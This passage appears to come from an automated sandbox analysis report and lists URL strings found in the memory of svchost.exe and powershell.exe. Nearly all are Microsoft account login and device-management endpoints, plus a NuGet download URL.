                            Source: svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                            Source: svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srfe.com
                            Source: svchost.exe, 00000003.00000002.3036859939.00000216C322B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                            Source: svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                            Source: svchost.exe, 00000003.00000003.1134749358.00000216C3B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                            Source: svchost.exe, 00000003.00000003.1134749358.00000216C3B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                            Source: svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600er
                            Source: svchost.exe, 00000003.00000003.1134749358.00000216C3B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                            Source: svchost.exe, 00000003.00000002.3036859939.00000216C322B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&p;
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                            Source: svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf53457
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3037334213.00000216C3309000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                            Source: svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3034806357.00000216C3B19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3037334213.00000216C3309000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3037334213.00000216C3309000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                            Source: svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsec
                            Source: svchost.exe, 00000003.00000003.1134749358.00000216C3B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                            Source: svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srfer
                            Source: svchost.exe, 00000003.00000003.1134749358.00000216C3B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                            Source: svchost.exe, 00000003.00000003.1134749358.00000216C3B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                            Source: svchost.exe, 00000003.00000003.1134749358.00000216C3B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3037334213.00000216C3309000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                            Source: svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                            Source: svchost.exe, 00000003.00000003.1134749358.00000216C3B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                            Source: svchost.exe, 00000003.00000002.3037334213.00000216C3309000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/Inl
                            Source: svchost.exe, 00000003.00000003.1134749358.00000216C3B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135562377.00000216C3B2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                            Source: svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600g:OOBEignInAuthUp
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036859939.00000216C322B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3035735932.00000216C3B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3034177266.00000216C3B4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3037334213.00000216C3309000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                            Source: svchost.exe, 00000003.00000002.3037334213.00000216C3309000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135562377.00000216C3B2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                            Source: svchost.exe, 00000003.00000003.1134749358.00000216C3B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                            Source: svchost.exe, 00000003.00000003.1135562377.00000216C3B2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                            Source: svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502&
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3035735932.00000216C3B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3034177266.00000216C3B4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3035735932.00000216C3B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3034177266.00000216C3B4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3035735932.00000216C3B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3034177266.00000216C3B4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                            Source: svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135562377.00000216C3B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                            Source: svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135562377.00000216C3B2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                            Source: svchost.exe, 00000003.00000002.3037334213.00000216C3309000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135562377.00000216C3B2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                            Source: svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135562377.00000216C3B2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                            Source: svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135562377.00000216C3B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128451284.00000216C3B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                            Source: svchost.exe, 00000003.00000002.3036859939.00000216C322B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                            Source: svchost.exe, 00000003.00000003.1126979078.00000216C3B5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                            Source: svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cpng
                            Source: svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135562377.00000216C3B2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                            Source: svchost.exe, 00000003.00000002.3037969213.00000216C4269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf#
                            Source: svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf$
                            Source: svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfer
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3035735932.00000216C3B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3034177266.00000216C3B4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                            Source: svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfLive
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3035603974.00000216C3B38000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3035352162.00000216C3B37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                            Source: svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srfce
                            Source: svchost.exe, 00000003.00000002.3037334213.00000216C3309000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonliX
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                            Source: svchost.exe, 00000003.00000002.3037334213.00000216C3309000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecp
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                            Source: svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJ
                            Source: svchost.exe, 00000003.00000002.3037334213.00000216C3309000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.sr
                            Source: svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                            Source: svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3035735932.00000216C3B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3034177266.00000216C3B4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                            Source: svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3037334213.00000216C3309000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                            Source: svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                            Source: svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfen
                            Source: svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                            Source: powershell.exe, 0000000A.00000002.1358130401.00000238DD750000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                            Source: svchost.exe, 0000000D.00000003.1399934041.00000149EBA31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic
